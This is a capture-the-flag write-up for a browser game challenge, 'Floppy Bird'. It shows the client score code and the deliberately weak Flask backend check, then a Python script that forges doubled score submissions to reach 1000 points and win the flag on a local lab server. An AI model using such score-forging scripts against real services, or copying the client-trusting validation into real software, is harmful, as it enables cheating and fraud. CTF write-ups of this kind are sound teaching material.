# Floppy Bird

<b>Author</b>: [mattiabrandon](https://twitter.com/mattiabrandon)<br>
<b>Category</b>: Web<br>
<b>Solve</b>: 96<br>

## Descritpion
I have recreated one of the most classic games in the browser, can you score 1000 points and get the flag?

## How to run the server
To run the server you'll need [`docker`](https://docs.docker.com/get-docker/) and [`docker-compose`](https://docs.docker.com/compose/install/).<br>
Go into the `src` folder and from the command line run `docker-compose up --build -d`.<br>
Now you can connect to the server by opening [`http://localhost:31337/`](http://localhost:31337/) in your browser.<br>
To stop the server, from the command line run `docker-compose down`.

## Solution

The target of the challenge is to find out how the scoring system of the game works.

There are two javascript files in the client: game.js and score.js.

The first one contains the game logic, and doesn't add anything useful to the solution of the challenge, so trying to understand what it does means only losing time.

The file to look at is the second one, that contains the following code:

```javascript
let token;

function sendUpdateScore(score) {
    let xhr = new XMLHttpRequest();
    xhr.open("POST", window.location.protocol + "://" + window.location.host + "/update-score");
    xhr.setRequestHeader("Content-Type", "application/json");
    xhr.send(JSON.stringify({
        token: token,
        score: score
    }));
    xhr.onload = function() {
        res = JSON.parse(xhr.response);

        if (!res.ok) {
            window.location.href = "/error.html?error=" + res.error;
            return;
        } else if (res.flag) {
            window.location.href = "/flag.html?flag=" + res.flag;
            return
        }
    };
}

function updateScore(score) {
    if (!token) {
        let xhr = new XMLHttpRequest();
        xhr.open("GET", window.location.protocol + "://" + window.location.host + "/get-token");
        xhr.send();
        xhr.onload = function() {
            let res = JSON.parse(xhr.response);
    
            if (!res.ok) {
                window.location.href = "/error.html?error=" + res.error;
                return;
            }
            token = res.token;
            sendUpdateScore(score);
        };
    } else {
        sendUpdateScore(score);
    }
}
```

Reading this, or just simply analyzing the network traffic while playing the game, it's possible to understand that the client sends the score to the backend, and it returns a flag if the score is high enough.

We also had the code of the backend, so analyzing it we find the following method:

```python
@app.route('/update-score', methods=['POST'])
@limiter.limit('12/second', on_breach=lambda _: jsonify({'ok': False, 'error': 'Too many requests'}))
def update_score():
    if not request.json or 'token' not in request.json:
        return {'ok': False, 'error': 'No token was given, you need to get one if you want to play'}, 400
    client_score = request.json['score']

    if type(client_score) != int:
        return {'ok': False, 'error': 'Invalid score type, did you pass a correct number?'}
    elif type(request.json['token']) != str:
        return {'ok': False, 'error': 'Invalid token type, did you pass the correct token?'}
    db_score = db.execute(
        'SELECT score FROM scores WHERE token = ?',
        (request.json['token'],)
    ).fetchone()

    if db_score is None:
        return {'error': 'The given token is invalid, did I ever see you before?'}, 400
    db_score = db_score[0]

    if client_score == db_score + 1 or client_score == db_score * 2:
        db.execute(
            'UPDATE scores SET score = ? WHERE token = ?',
            (client_score, request.json['token'])
        )
    elif client_score > db_score:
        return {'ok': False, 'error': 'An invalid score was given, are you trying to hack me?'}, 400

    if client_score >= 1000:
        return {'ok': True, 'flag': flag}, 200
    return {'ok': True}, 200
```

From the line `if client_score == db_score + 1 or client_score == db_score * 2:` we can understand that the score is calculated as the sum between the previous score and 1, or the previous score multiplied by 2.

We can now write a script to retrieve the token and then multiply by 2 the score until we reach 1000 and get the flag:

```python
import requests
import json
import os

site = os.getenv('SITE', 'http://localhost:31337/')

if __name__ == '__main__':
    token = json.loads(
        requests.get(f'{site}/get-token').text
    )['token']
    score = 1
    requests.post(
        f'{site}/update-score',
        json={'token': token, 'score': score}
    )

    while score < 1000:
        score *= 2
        requests.post(
            f'{site}/update-score',
            json={'token': token, 'score': score}
        )

        if score * 2 > 1000:
            break
    print(
        json.loads(requests.post(
            f'{site}/update-score',
            json={'token': token, 'score': score * 2}
        ).text)['flag']
    )
```
